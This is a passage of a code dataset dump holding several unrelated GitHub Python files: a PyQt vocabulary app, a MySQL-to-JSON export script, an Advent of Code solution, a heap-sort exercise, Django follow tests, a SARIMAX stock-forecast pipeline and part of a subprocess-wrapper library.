self.ui.Btn_Toggle.clicked.connect(lambda: UIFunctions.toggleMenu(self, 250, True))\n\n ## PAGES\n ########################################################################\n\n # PAGE 1\n #Box Source\n self.ui.btn_page_1.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_1))\n self.ui.btn_page_1.clicked.connect(lambda:UIFunctions.assignLevel(self,0))\n # Box 1\n self.ui.btn_page_2.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_2.clicked.connect(lambda:UIFunctions.mapping(self,1))\n # Box 2\n self.ui.btn_page_3.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_3.clicked.connect(lambda:UIFunctions.mapping(self,2))\n # Box 3\n self.ui.btn_page_4.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_4.clicked.connect(lambda:UIFunctions.mapping(self,3))\n # Box 4\n self.ui.btn_page_5.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_5.clicked.connect(lambda:UIFunctions.mapping(self,4))\n # Box 5\n self.ui.btn_page_6.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_6.clicked.connect(lambda:UIFunctions.mapping(self,5))\n # Box Done\n self.ui.btn_page_7.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btn_page_7.clicked.connect(lambda:UIFunctions.mapping(self,6))\n # Box Custom\n self.ui.btnCustom.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnCustom.clicked.connect(lambda:UIFunctions.mapping(self,-1))\n # Box Recruitment\n self.ui.btnRecruitment.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnRecruitment.clicked.connect(lambda:UIFunctions.mapping(self,-2))\n # Box Workplace\n self.ui.btnWorkplace.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnWorkplace.clicked.connect(lambda:UIFunctions.mapping(self,-3))\n # Box Bussiness\n self.ui.btnBussiness.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnBussiness.clicked.connect(lambda:UIFunctions.mapping(self,-4))\n # Box Shopping\n self.ui.btnShopping.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnShopping.clicked.connect(lambda:UIFunctions.mapping(self,-5))\n # Box Travel\n self.ui.btnTravel.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnTravel.clicked.connect(lambda:UIFunctions.mapping(self,-6))\n\n #Edit or Save\n self.ui.btn_edit.clicked.connect(lambda:UIFunctions.edit_Vocabulary(self))\n #Delete\n self.ui.btn_delete.clicked.connect(lambda:UIFunctions.delete_Vocabulary(self))\n #Practice\n #self.ui.btn_practice.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.frmPractice))\n self.ui.btn_practice.clicked.connect(lambda: UIFunctions.findListPractice(self))\n #Submit\n self.ui.btnSubmit.clicked.connect(lambda: UIFunctions.isCorrect(self,self.ui.lstPractice[0][1]))\n #Micro\n self.ui.btnMic.clicked.connect(lambda: UIFunctions.listenning(self))\n #Review \n self.ui.btn_review.clicked.connect(lambda: UIFunctions.reviewVocabulary(self))\n #Cancel ở form Practice\n self.ui.btnCancel.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_2))\n self.ui.btnCancel.clicked.connect(lambda:UIFunctions.mapping(self,self.ui.level))\n #Đọc từ vựng ở trong ô text\n self.ui.btnSpeak.clicked.connect(lambda: UIFunctions.speaking(self))\n\n #Quit để thoát ứng dụng\n \n self.ui.btnQuit.clicked.connect( lambda:UIFunctions.message_box(self))\n\n #Result để xem biểu đồ thống kê kết quả học tập\n self.ui.btnResult.clicked.connect(lambda: self.ui.stackedWidget.setCurrentWidget(self.ui.page_3))\n self.ui.btnResult.clicked.connect(lambda:UIFunctions.assignLevel(self,7))\n # self.ui.btnResult.clicked.connect( lambda:drawGraph())\n # Xem thống kê tình hình học tập từ ngày A đến ngày B\n self.ui.btnShowResultByDay.clicked.connect(lambda: drawGraph(self.ui.dateFrom.date(),self.ui.dateTo.date()))\n # Xem thống kê tình hình học tập trong tháng\n self.ui.btnShowResultByMonth.clicked.connect(lambda: drawGraph(self.ui.dateMonth.date(),QDate(self.ui.dateMonth.date().year(),self.ui.dateMonth.date().month(),numberOfDays(self.ui.dateMonth.date().year(),self.ui.dateMonth.date().month()))))\n # Xuất ra excel tình hình học tập từ ngày A đến ngày B\n self.ui.btnExportResultByDay.clicked.connect(lambda: exportToExcel(self.ui.dateFrom.date(),self.ui.dateTo.date()))\n # Xem thống kê tình hình học tập trong tháng\n self.ui.btnExportResultByMonth.clicked.connect(lambda: exportToExcel(self.ui.dateMonth.date(),QDate(self.ui.dateMonth.date().year(),self.ui.dateMonth.date().month(),numberOfDays(self.ui.dateMonth.date().year(),self.ui.dateMonth.date().month()))))\n\n \n # Khi nhấn vào table vocabylary thì sẽ binding dữ liệu sang form\n self.ui.tlwBoxWord.clicked.connect(lambda:UIFunctions.displayDetailVocabulary(self))\n # Khi nhấn vào button chọn hình ảnh\n self.ui.btn_image.clicked.connect(lambda:UIFunctions.loadImage(self))\n # Khi nhấn vào nút Cancel để huỷ thao tác Edit hoặc Add từ vựng\n self.ui.btn_cancel.clicked.connect(lambda:UIFunctions.cancelEditOrAdd(self))\n # Đổi tên Box theo số từ còn lại ở trong Box\n for i in range(1,6):\n UIFunctions.renameBox(self,i)\n ## SHOW ==> MAIN WINDOW\n ########################################################################\n \n self.show()\n ## ==> END ##\nclass Ui_Form(object):\n def setupUi(self, Form):\n \n def easyLevel():\n print(1)\n global numwords\n numwords = 3\n Form.setHidden(True)\n MainWindow()\n def mediumLevel():\n global numwords\n print(2)\n numwords = 5\n Form.setHidden(True)\n MainWindow()\n def hardLevel():\n print(3)\n global numwords\n numwords = 10\n Form.setHidden(True)\n MainWindow()\n Form.setObjectName(\"Form\")\n Form.resize(403, 505)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(Form.sizePolicy().hasHeightForWidth())\n Form.setSizePolicy(sizePolicy)\n Form.setAutoFillBackground(False)\n Form.setStyleSheet(\"background:rgb(2, 14, 30) \")\n self.btnEasy = QtWidgets.QPushButton(Form)\n self.btnEasy.setGeometry(QtCore.QRect(20, 20, 361, 131))\n self.btnEasy.clicked.connect(easyLevel)\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.btnEasy.setFont(font)\n self.btnEasy.setStyleSheet(\"background:rgb(85, 170, 255);\\n\"\n \"color:rgb(255, 255, 255)\")\n self.btnEasy.setObjectName(\"btnEasy\")\n self.btnMedium = QtWidgets.QPushButton(Form)\n self.btnMedium.setGeometry(QtCore.QRect(20, 160, 361, 131))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.btnMedium.setFont(font)\n self.btnMedium.setStyleSheet(\"background:rgb(85, 170, 255);\\n\"\n \"color:rgb(255, 255, 255)\")\n self.btnMedium.setObjectName(\"btnMedium\")\n self.btnHard = QtWidgets.QPushButton(Form)\n self.btnMedium.clicked.connect(mediumLevel)\n self.btnHard.setGeometry(QtCore.QRect(20, 300, 361, 131))\n font = QtGui.QFont()\n font.setPointSize(20)\n font.setBold(True)\n font.setWeight(75)\n self.btnHard.setFont(font)\n self.btnHard.setStyleSheet(\"background:rgb(85, 170, 255);\\n\"\n \"color:rgb(255, 255, 255)\")\n self.btnHard.setObjectName(\"btnHard\")\n self.label = QtWidgets.QLabel(Form)\n self.btnHard.clicked.connect(hardLevel)\n self.label.setGeometry(QtCore.QRect(30, 450, 341, 31))\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())\n self.label.setSizePolicy(sizePolicy)\n font = QtGui.QFont()\n font.setPointSize(14)\n self.label.setFont(font)\n self.label.setStyleSheet(\"color:rgb(255, 255, 255)\")\n self.label.setObjectName(\"label\")\n\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n \n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Form\"))\n self.btnEasy.setText(_translate(\"Form\", \"Easy\"))\n self.btnMedium.setText(_translate(\"Form\", \"Medium\"))\n self.btnHard.setText(_translate(\"Form\", \"Hard\"))\n self.label.setText(_translate(\"Form\", \"Vui lòng chọn độ khó để tiếp tục.\"))\n\nif __name__ == \"__main__\":\n Date_Now = date.today()\n Date_Old = findMaxDate()\n app = QApplication(sys.argv)\n\n print(Date_Now)\n print(Date_Old)\n if Date_Now > Date_Old:\n Form = QtWidgets.QWidget()\n ui = Ui_Form()\n ui.setupUi(Form)\n Form.show()\n else:\n MainWindow()\n sys.exit(app.exec_()) \n","repo_name":"nghiabv120100/PracticeDaily","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74654869172","text":"import json\nimport pymysql\nimport urllib.parse\nimport requests\nimport json\ndb = pymysql.Connect(\n host = 'localhost',\n port = 3306,\n user = 'root',\n password = 'root',\n db = 'qunar',\n charset = 'utf8'\n)\ncur = db.cursor()\nsql = 'select a.sale,lat,lng from ((select address,sale from qunar_new) a left join (select title,lat,lng from address) b on a.address = b.title) where lat != \\\"\\\"'\ncur.execute(sql)\nres = cur.fetchall()\npoints = []\nfor item in res:\n points.append({\"lng\":item[2],\"lat\":item[1],\"count\":item[0]})\nstr=json.dumps(points)\nprint(str)\nwith open('C:\\\\Users\\\\admin\\\\Desktop\\\\data.txt','w') as f: #设置文件对象\n f.write(str)\n f.close()","repo_name":"LATHX/crawler","sub_path":"travle/extract_json.py","file_name":"extract_json.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45170978131","text":"# https://adventofcode.com/2020/day/11\n\nimport os\nfrom pprint import pprint\n\nimport copy\n\nSCRIPT_DIR = os.path.dirname(__file__)\nINPUT_FILENAME = 'inputs.txt'\nSAMPLE_INPUTS_FILENAME = 'inputs_sample.txt'\n\n\ndef get_inputs(filename=INPUT_FILENAME):\n filepath = os.path.join(SCRIPT_DIR, filename)\n inputs = []\n\n with open(filepath, 'r') as f:\n inputs = f.read().splitlines()\n\n return inputs\n\n\ndef do_seats(rows):\n new_rows = copy.deepcopy(rows)\n new_num_occupied = 0\n\n for y, cols in enumerate(rows):\n for x, col in enumerate(cols):\n if col == '.':\n continue\n\n num_occupied = 0\n for dy in range(-1, 2):\n for dx in range(-1, 2):\n ax = x + dx\n ay = y + dy\n\n if x == ax and y == ay:\n continue\n\n if ay < 0 or ay >= len(rows):\n continue\n\n if ax < 0 or ax >= len(cols):\n continue\n\n if rows[ay][ax] == '#':\n num_occupied += 1\n\n if col == 'L' and num_occupied == 0:\n new_rows[y][x] = '#'\n\n elif col == '#' and num_occupied >= 4:\n new_rows[y][x] = 'L'\n\n if new_rows[y][x] == '#':\n new_num_occupied += 1\n\n return new_rows, new_num_occupied\n\ndef process(inputs):\n seats = []\n for row in inputs:\n seats.append(list(row))\n\n prev_occupied = -1\n num_occupied = 0\n\n while True:\n prev_occupied = num_occupied\n seats, num_occupied = do_seats(seats)\n\n if num_occupied == prev_occupied:\n break\n\n return num_occupied\n\n\ntest_inputs = get_inputs(filename=SAMPLE_INPUTS_FILENAME)\ntest_answer = process(test_inputs)\nprint(f'test answer:', test_answer)\nassert test_answer == 37\n\ninputs = get_inputs(filename=INPUT_FILENAME)\nanswer = process(inputs)\nprint(f'answer:', answer)\nassert answer == 2183\n","repo_name":"thalida/adventofcode","sub_path":"2020/day-11/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12256832151","text":"class Solution:\n def smallestK(self, arr, k):\n if not arr or not k:\n return []\n\n def heapify(arr, i, n):\n left = 2 * i + 1\n right = 2 * i + 2\n\n minNum = i\n if left < n and arr[minNum] > arr[left]:\n minNum = left\n if right < n and arr[minNum] > arr[right]:\n minNum = right\n\n if minNum != i:\n arr[i], arr[minNum] = arr[minNum], arr[i]\n heapify(arr, minNum, n)\n\n def heapSort(arr):\n n = len(arr)\n tmp = []\n for i in range(n // 2 - 1, -1, -1):\n heapify(arr, i, n)\n\n for i in range(n - 1, -1, -1):\n arr[i], arr[0] = arr[0], arr[i]\n tmp.append(arr[i])\n if len(tmp) == k:\n return tmp\n heapify(arr, 0, i)\n\n return heapSort(arr)\n\n\nif __name__ == '__main__':\n s = Solution()\n arr = [1, 3, 5, 7, 2, 4, 6, 8]\n k = 4\n ans = s.smallestK(arr, k)\n print(ans)\n","repo_name":"PlutoaCharon/CodeExercise_Python","sub_path":"LeetCode/面试题 17.14. 最小K个数.py","file_name":"面试题 17.14. 最小K个数.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19019502913","text":"from django.test import Client, TestCase\nfrom django.urls import reverse\nfrom ..models import User\nfrom ..models import Follow\n\n\nclass TestFollow(TestCase):\n \"\"\"Проверка подписок\"\"\"\n @classmethod\n def setUpClass(cls):\n cls.user = User.objects.create_user(username='follower')\n cls.author = User.objects.create_user(username='following')\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass\n\n def setUp(self):\n self.client1 = Client()\n self.client1.force_login(self.user)\n self.client2 = Client()\n self.client2.force_login(self.author)\n\n def test_follow(self):\n follow_count = Follow.objects.all().count()\n self.client1.get(\n reverse(\n 'posts:profile_follow',\n kwargs={'username': self.author.username}\n )\n )\n self.assertEqual(Follow.objects.all().count(), follow_count + 1)\n\n def test_unfollow(self):\n follow_count = Follow.objects.all().count()\n self.client1.get(\n reverse(\n 'posts:profile_follow',\n kwargs={'username': self.author.username}\n )\n )\n self.assertEqual(Follow.objects.all().count(), follow_count + 1)\n follow_cnt = Follow.objects.all().count()\n self.client2.get(\n reverse(\n 'posts:profile_unfollow',\n kwargs={'username': self.author.username}\n )\n )\n self.assertEqual(Follow.objects.all().count(), follow_cnt)\n","repo_name":"NotFound35/hw05_final","sub_path":"yatube/posts/tests/test_follow.py","file_name":"test_follow.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3114573774","text":"'''\nCreated on May 18, 2021\n\n@author: zollen\n'''\n\nimport pandas_datareader.data as web\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport numpy as np\nimport itertools\nfrom statsmodels.tsa.seasonal import STL\nimport matplotlib.pyplot as plt\nfrom statsmodels.graphics.tsaplots import plot_pacf\nfrom sklearn.model_selection import TimeSeriesSplit\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\nfrom statsmodels.tsa.stattools import adfuller\nfrom sklearn.metrics import mean_squared_error\nfrom kedro.pipeline import node\nfrom kedro.pipeline import Pipeline\nfrom kedro.io import DataCatalog, MemoryDataSet\nfrom kedro.runner import SequentialRunner\nimport seaborn as sb\nimport warnings\n\nwarnings.filterwarnings('ignore')\n\nsb.set_style('whitegrid')\n\npd.set_option('max_columns', None)\npd.set_option('max_rows', None)\n\nSHOW_GRAPHS = False\nWEEKS_FOR_ANALYSIS = 72\nTRAIN_SIZE=2120\nTEST_SIZE = 14\nTIME_SPLITS_CV = 6\nTICKER = 'VVL.TO'\n\n\ndef perform_adf_test(series):\n result = adfuller(series)\n print('ADF Statistic: %f' % result[0])\n print('p-value: %f' % result[1])\n \ndef get_stock():\n start_date, end_date = datetime.now().date() - timedelta(weeks=WEEKS_FOR_ANALYSIS), datetime.now().date()\n vvl = web.DataReader(TICKER, 'yahoo', start=start_date, end=end_date).Close\n dwi = web.DataReader('^DJI', 'yahoo', start=start_date, end=end_date).Close\n spi = web.DataReader('^GSPTSE', 'yahoo', start=start_date, end=end_date).Close\n vvl.index = [d.date() for d in vvl.index]\n \n prices = pd.DataFrame({'Date' : vvl.index, \n 'VVL.TO' : vvl.values, \n 'DOW': dwi[vvl.index].values,\n 'TSX': spi[vvl.index].values })\n \n prices['Date'] = pd.to_datetime(prices['Date'])\n prices = prices.set_index('Date')\n prices = prices.asfreq(pd.infer_freq(prices.index), method=\"pad\")\n prices['VVL.TO'] = prices['VVL.TO'].astype('float64')\n prices['DOW'] = prices['DOW'].astype('float64')\n prices['TSX'] = prices['TSX'].astype('float64')\n \n prices['DOW'] = prices['DOW'].fillna(method='ffill', axis=0)\n \n \n return prices\n\ngetStockNode = node(get_stock, inputs=None, outputs=\"trade_data\")\n\n\ndef analysis_data(trade_data):\n \n if False:\n _, (a1, a2, a3, a4, a5) = plt.subplots(5, 1,figsize=(15,8))\n a1.plot(trade_data['VVL.TO'])\n a1.set_ylabel('VVL.TO', fontsize=8)\n a2.plot(trade_data['DOW'])\n a2.set_ylabel('DOW', fontsize=8)\n a3.plot(trade_data['TSX'])\n a3.set_ylabel('TSX', fontsize=8)\n \n print(trade_data[['VVL.TO', 'DOW', 'TSX']].corr())\n \n sb.regplot(x=\"VVL.TO\", y=\"DOW\", data=trade_data, \n marker='.', fit_reg = False, scatter_kws = {'alpha' : 0.8}, ax=a4)\n sb.regplot(x=\"VVL.TO\", y=\"TSX\", data=trade_data, \n marker='.', fit_reg = False, scatter_kws = {'alpha' : 0.8}, ax=a5)\n \n trade_data['VVL.TO'] = trade_data['VVL.TO'].diff()\n trade_data['DOW'] = trade_data['DOW'].diff()\n trade_data['TSX'] = trade_data['TSX'].diff()\n trade_data.dropna(inplace = True)\n \n if False: \n perform_adf_test(trade_data['VVL.TO'])\n perform_adf_test(trade_data['DOW'])\n perform_adf_test(trade_data['TSX'])\n \n \n if False:\n # inconclusive\n _, a1 = plt.subplots(1, 1)\n a1.set_ylabel('NORMALIZE(VVL.TO)', fontsize=8)\n plot_pacf(trade_data['VVL.TO'], ax=a1, title=\"PACF Analysis of VVL.TO\")\n \n if False:\n stl = STL(trade_data['VVL.TO'])\n result = stl.fit()\n \n seasonal, trend, resid = result.seasonal, result.trend, result.resid\n \n plt.figure(figsize=(8,6))\n \n plt.subplot(4,1,1)\n plt.plot(trade_data['VVL.TO'])\n plt.title('Original Series', fontsize=16)\n \n plt.subplot(4,1,2)\n plt.plot(trend)\n plt.title('Trend', fontsize=16)\n \n plt.subplot(4,1,3)\n plt.plot(seasonal)\n plt.title('Seasonal', fontsize=16)\n \n plt.subplot(4,1,4)\n plt.plot(resid)\n plt.title('Residual', fontsize=16)\n \n plt.tight_layout()\n\n \n \n\nanalysisNode = node(analysis_data, inputs=[\"trade_data\"], outputs=None)\n\n\n\ndef optimize_model(trade_data):\n \n if True: \n params = []\n aics = []\n mses = []\n \n p = [0, 1, 2, 3, 4]\n q = [0, 1, 2, 3, 4]\n pp = [ 0, 1, 2, 3, 4 ]\n qq = [ 0, 1, 2, 3, 4 ]\n ss = [ 1, 2, 3, 4, 5 ]\n pdq = list(itertools.product(p, [1], q))\n spqd = list(itertools.product(pp, [1], qq, ss))\n pdq.remove((0,1,0))\n \n total = len(pdq) * len(spqd)\n count = 0\n \n for param in pdq:\n \n for sparam in spqd:\n \n try:\n \n count += 1\n print(\"PROGRESS: \", ( 1 / total) * 100, \"%\")\n \n tscv = TimeSeriesSplit(n_splits=TIME_SPLITS_CV, max_train_size=TRAIN_SIZE, test_size=TEST_SIZE)\n aics_t = []\n mses_t = []\n for train_index, test_index in tscv.split(trade_data):\n \n X_train, X_test = trade_data.iloc[train_index], trade_data.iloc[test_index]\n \n model = SARIMAX(X_train['VVL.TO'],\n order=param,\n seasonal_order=sparam,\n enforce_stationarity=False,\n enforce_invertibility=False)\n results = model.fit() \n \n pred = results.get_prediction(start = X_test.index[0],\n end = X_test.index[-1])\n \n aics_t.append(results.aic)\n mses_t.append(mean_squared_error(X_test['VVL.TO'].iloc[:-1], pred.predicted_mean[1:])) \n \n params.append((param, sparam))\n aics.append(np.sum(aics_t) / len(aics_t))\n mses.append(np.sum(mses_t) / len(mses_t)) \n \n except:\n continue\n \n \n min_ind = aics.index(min(aics)) \n bestparam = params[min_ind]\n print('best_param_aic:', bestparam, ' aic:', min(aics)) \n min_ind = mses.index(min(mses)) \n bestparam = params[min_ind]\n print('best_param_mse:', bestparam, ' mse:', min(mses))\n \n '''\n best_param_aic: (2, 1, 2)(0, 0, 0, 0) aic: 30.706256895869064\n best_param_mse: (2, 1, 2)(0, 0, 0, 0) mse: 0.14321048365277564\n \n best_param_aic: (3, 1, 5)(2, 1, 2, 12) aic: 557.9136442544652\n best_param_mse: (4, 1, 5)(2, 1, 2, 12) mse: 0.15319565381354142\n '''\n\noptimizeNode = node(optimize_model, inputs=[\"trade_data\"], outputs=None)\n\n\n\ndef test_model(trade_data):\n '''\n (2, 1, 2)(2, 1, 2, 3): 0.0785\n (2, 1, 2)(2, 1, 2, 4): 0.1442\n (3, 1, 3)(2, 1, 2, 4): 0.1391\n (3, 1, 3)(1, 1, 1, 4): 0.1391\n '''\n \n G_train = trade_data.iloc[-(TEST_SIZE)*2:]\n X_train = trade_data.iloc[-TRAIN_SIZE-TEST_SIZE:-TEST_SIZE]\n X_test = trade_data.iloc[-TEST_SIZE:]\n \n model = SARIMAX(X_train['VVL.TO'],\n order=(2, 1, 2),\n seasonal_order=(3, 1, 3, 4),\n enforce_stationarity=False,\n enforce_invertibility=False)\n results = model.fit() \n \n preds = results.get_prediction(start = X_test.index[0],\n end = X_test.index[-1] + timedelta(days = 1))\n \n print(\"RMSE: %0.4f\" % np.sqrt((mean_squared_error(X_test['VVL.TO'], preds.predicted_mean[1:]))))\n \n if True:\n plt.figure(figsize=(10,4))\n plt.plot(G_train['VVL.TO'])\n plt.plot(X_test.index, preds.predicted_mean[1:])\n plt.legend(('Data', 'Predictions'), fontsize=16)\n plt.title(\"Price vs Prediction\", fontsize=20)\n plt.ylabel('Price', fontsize=16) \n \n \n \n\ntestNode = node(test_model, inputs=[\"trade_data\"], outputs=None)\n\n# Create a data source\ndata_catalog = DataCatalog({\"trade_data\": MemoryDataSet()})\n\n# Assign \"nodes\" to a \"pipeline\"\npipeline = Pipeline([ \n getStockNode,\n analysisNode,\n # optimizeNode,\n testNode\n ])\n\n# Create a \"runner\" to run the \"pipeline\"\nrunner = SequentialRunner()\n\n# Execute a pipeline\nrunner.run(pipeline, data_catalog)\n\n\nplt.show()","repo_name":"zollen/Python-ML","sub_path":"time_series/analysis3_vvl.py","file_name":"analysis3_vvl.py","file_ext":"py","file_size_in_byte":8784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22926663355","text":"# encoding: utf-8\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n# Contact: Kyle Lahnakoski (kyle@lahnakoski.com)\n#\nfrom __future__ import absolute_import, division, unicode_literals\n\nimport os\nimport platform\nimport subprocess\n\nfrom mo_dots import set_default, wrap, Null\nfrom mo_logs import Log, strings\nfrom mo_logs.exceptions import Except\nfrom mo_threads.lock import Lock\nfrom mo_threads.queues import Queue\nfrom mo_threads.signals import Signal\nfrom mo_threads.threads import THREAD_STOP, Thread\nfrom mo_threads.till import Till\nfrom mo_times import Timer\n\nDEBUG = True\n\n\nclass Process(object):\n def __init__(self, name, params, cwd=None, env=None, debug=False, shell=False, bufsize=-1):\n self.name = name\n self.service_stopped = Signal(\"stopped signal for \" + strings.quote(name))\n self.stdin = Queue(\"stdin for process \" + strings.quote(name), silent=True)\n self.stdout = Queue(\"stdout for process \" + strings.quote(name), silent=True)\n self.stderr = Queue(\"stderr for process \" + strings.quote(name), silent=True)\n\n try:\n if cwd == None:\n cwd = os.getcwd()\n else:\n cwd = str(cwd)\n\n self.debug = debug or DEBUG\n self.service = service = subprocess.Popen(\n [str(p) for p in params],\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n bufsize=bufsize,\n cwd=cwd,\n env={str(k): str(v) for k, v in set_default(env, os.environ).items()},\n shell=shell\n )\n\n self.please_stop = Signal()\n self.please_stop.then(self._kill)\n self.child_locker = Lock()\n self.children = [\n Thread.run(self.name + \" stdin\", self._writer, service.stdin, self.stdin, please_stop=self.service_stopped, parent_thread=self),\n Thread.run(self.name + \" stdout\", self._reader, \"stdout\", service.stdout, self.stdout, please_stop=self.service_stopped, parent_thread=self),\n Thread.run(self.name + \" stderr\", self._reader, \"stderr\", service.stderr, self.stderr, please_stop=self.service_stopped, parent_thread=self),\n Thread.run(self.name + \" waiter\", self._monitor, parent_thread=self),\n ]\n except Exception as e:\n Log.error(\"Can not call\", e)\n\n self.debug and Log.note(\"{{process}} START: {{command}}\", process=self.name, command=\" \".join(map(strings.quote, params)))\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.join(raise_on_error=True)\n\n def stop(self):\n self.stdin.add(THREAD_STOP) # ONE MORE SEND\n self.please_stop.go()\n\n def join(self, raise_on_error=False):\n self.service_stopped.wait()\n with self.child_locker:\n child_threads, self.children = self.children, []\n for c in child_threads:\n c.join()\n if raise_on_error and self.returncode != 0:\n Log.error(\n \"{{process}} FAIL: returncode={{code}}\\n{{stderr}}\",\n process=self.name,\n code=self.service.returncode,\n stderr=list(self.stderr)\n )\n return self\n\n def remove_child(self, child):\n with self.child_locker:\n try:\n self.children.remove(child)\n except Exception:\n pass\n\n @property\n def pid(self):\n return self.service.pid\n\n @property\n def returncode(self):\n return self.service.returncode\n\n def _monitor(self, please_stop):\n with Timer(self.name):\n self.service.wait()\n self.debug and Log.note(\"{{process}} STOP: returncode={{returncode}}\", process=self.name, returncode=self.service.returncode)\n self.service_stopped.go()\n please_stop.go()\n\n def _reader(self, name, pipe, receive, please_stop):\n try:\n while not please_stop and self.service.returncode is None:\n line = to_text(pipe.readline().rstrip())\n if line:\n receive.add(line)\n self.debug and Log.note(\"{{process}} ({{name}}): {{line}}\", name=name, process=self.name, line=line)\n else:\n (Till(seconds=1) | please_stop).wait()\n\n # GRAB A FEW MORE LINES\n max = 100\n while max:\n try:\n line = to_text(pipe.readline().rstrip())\n if line:\n max = 100\n receive.add(line)\n self.debug and Log.note(\"{{process}} RESIDUE: ({{name}}): {{line}}\", name=name, process=self.name, line=line)\n else:\n max -= 1\n except Exception:\n break\n finally:\n pipe.close()\n receive.add(THREAD_STOP)\n self.debug and Log.note(\"{{process}} ({{name}} is closed)\", name=name, process=self.name)\n\n receive.add(THREAD_STOP)\n\n def _writer(self, pipe, send, please_stop):\n while not please_stop:\n line = send.pop(till=please_stop)\n if line is THREAD_STOP:\n please_stop.go()\n break\n elif line is None:\n continue\n\n self.debug and Log.note(\"{{process}} (stdin): {{line}}\", process=self.name, line=line.rstrip())\n pipe.write(line.encode('utf8') + b\"\\n\")\n pipe.flush()\n\n def _kill(self):\n try:\n self.service.kill()\n Log.note(\"Service was successfully terminated.\")\n except Exception as e:\n ee = Except.wrap(e)\n if 'The operation completed successfully' in ee:\n return\n if 'No such process' in ee:\n return\n\n Log.warning(\"Failure to kill process {{process|quote}}\", process=self.name, cause=ee)\n\n\nWINDOWS_ESCAPE_DCT = {\n u\"%\": u\"%%\",\n u\"&\": u\"^&\",\n u\"\\\\\": u\"^\\\\\",\n u\"<\": u\"^<\",\n u\">\": u\"^>\",\n u\"^\": u\"^^\",\n u\"|\": u\"^|\",\n u\"\\t\": u\"^\\t\",\n u\"\\n\": u\"^\\n\",\n u\"\\r\": u\"^\\r\",\n u\" \": u\"^ \",\n}\n\nPROMPT = \"READY_FOR_MORE\"\n\nif \"windows\" in platform.system().lower():\n # def cmd_escape(v):\n # return \"\".join(WINDOWS_ESCAPE_DCT.get(c, c) for c in v)\n cmd_escape = strings.quote\n\n def set_prompt():\n return \"prompt \"+PROMPT+\"$g\"\n\n def cmd():\n return \"%windir%\\\\system32\\\\cmd.exe\"\n\n def to_text(value):\n return value.decode(\"latin1\")\n\nelse:\n cmd_escape = strings.quote\n\n def set_prompt():\n return \"set prompt=\"+cmd_escape(PROMPT+\">\")\n\n def cmd():\n return \"bash\"\n\n def to_text(value):\n return value.decode(\"latin1\")\n\n\nclass Command(object):\n \"\"\"\n FASTER Process CLASS - OPENS A COMMAND_LINE APP (CMD on windows) AND KEEPS IT OPEN FOR MULTIPLE COMMANDS\n EACH WORKING DIRECTORY WILL HAVE ITS OWN PROCESS, MULTIPLE PROCESSES WILL OPEN FOR THE SAME DIR IF MULTIPLE\n THREADS ARE REQUESTING Commands\n \"\"\"\n\n available_locker = Lock(\"cmd lock\")\n available_process = {}\n\n def __init__(self, name, params, cwd=None, env=None, debug=False, shell=False, bufsize=-1):\n shell = True\n self.name=name\n self.key = (cwd, wrap(env), debug, shell)\n self.stdout = Queue(\"stdout for 